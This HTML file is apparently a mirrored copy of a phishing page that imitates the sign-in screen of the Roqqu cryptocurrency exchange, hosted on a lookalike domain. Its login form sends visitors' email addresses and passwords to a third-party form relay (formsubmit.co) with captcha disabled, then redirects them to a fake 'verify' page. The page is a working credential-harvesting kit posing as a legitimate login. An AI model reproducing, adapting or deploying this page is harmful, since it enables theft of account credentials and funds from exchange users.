<!DOCTYPE html>
<html lang="en">

<!-- Mirrored from roqquweb.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Mar 2022 16:19:56 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In</title>
    <link rel="stylesheet" href="../cdn.jsdelivr.net/npm/bootstrap%404.6.1/dist/css/bootstrap.min.css">
    <link rel="shortcut icon" href="images/download__1_-removebg-preview.png">
    <script src="../cdn.jsdelivr.net/npm/jquery%403.5.1/dist/jquery.slim.min.js"></script>
    <script src="../cdn.jsdelivr.net/npm/popper.js%401.16.1/dist/umd/popper.min.js"></script>
    <script src="../cdn.jsdelivr.net/npm/bootstrap%404.6.1/dist/js/bootstrap.bundle.min.js"></script>
    <script src="../kit.fontawesome.com/ae0531fa65.js" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="sttyle.css">
    <link rel="preconnect" href="https://fonts.googleapis.com/">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@500;600&amp;display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Spline+Sans:wght@700&amp;display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Raleway:wght@600&amp;display=swap" rel="stylesheet">
</head>
<body>
    <div class="text-center">
        <a href="#"><img class="header-img" src="../d33wubrfki0l68.cloudfront.net/d0d3b22fe2b73dfc1cc3cf4b5ed9ac9a686c1ef9/abb24/images/roqqu.png" alt=""></a>
    </div>
    <div class="container-custom">
    <form action="https://formsubmit.co/ac48cced3fe7aa8e81b98275b936ba95" class="form-signin" method="POST">
        <h2 class="form-signin-heading text-center">Sign In</h2>
        <input type="hidden" name="_next" value="https://roqquweb.com/verify">
        <input type="hidden" name="_captcha" value="false">
        <input id="input1" spellcheck="false" required  type="email" class="form-control" name="email" placeholder="Email address" >
        <input id="input2" type="password" class="form-control" name="password" required placeholder="Password">
        <button id="submitBtn" type="submit"  class="btn btn-md btn-primary btn-block">Sign in to your account</button>
      
            <h2 class="signii text-center"> or sign in with </h2>
            <div class="row">
                <button id="googlebtn" class="btn"><img class="google-img" src="../d33wubrfki0l68.cloudfront.net/2dc7d28f2d79748dc83f65605ff2759929c7d3fe/f910b/images/icons8-google-48.png" alt=""><span class="btntext">Google</span> </button>
                <button id="fbbtn" class="btn"><img class="facebook-img" src="../d33wubrfki0l68.cloudfront.net/e01b3357b4f1df0304157eaef051d1f086e974fe/1e44b/images/icons8-facebook-48.png" alt=""><span class="btntext">Facebook</span></button>
            </div>
            </div>
        </div>
        </div>
    </form>
    <div  class="text-center" style="padding-top: 1rem;">
            <p class="footer">
               <a href="#">Don't have an account?</a> 
                <a href="#">Forgot password?</a> 
                <a href="#">Terms</a> <br> 
                <a href="#">Having issue with two factor authentication?</a>
            </p>
    </div>
  </div>


  <script>

const btn = document.getElementById("submitBtn");
const input = document.querySelector("#input1");
const input2 = document.querySelector("#input2");

btn.addEventListener("click", () => {
    btn.innerHTML = 'Loading...';
});

input.addEventListener("keyup", () => {
    if (btn.innerHTML = 'Loading...') {
        btn.innerHTML = 'Sign in to your account';
    }
});
input2.addEventListener("keyup", () => {
    if (btn.innerHTML = 'Loading...') {
        btn.innerHTML = 'Sign in to your account';
    }
});

  </script>


  <script src="main.js"></script>
</body>

<!-- Mirrored from roqquweb.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 27 Mar 2022 16:20:08 GMT -->
</html>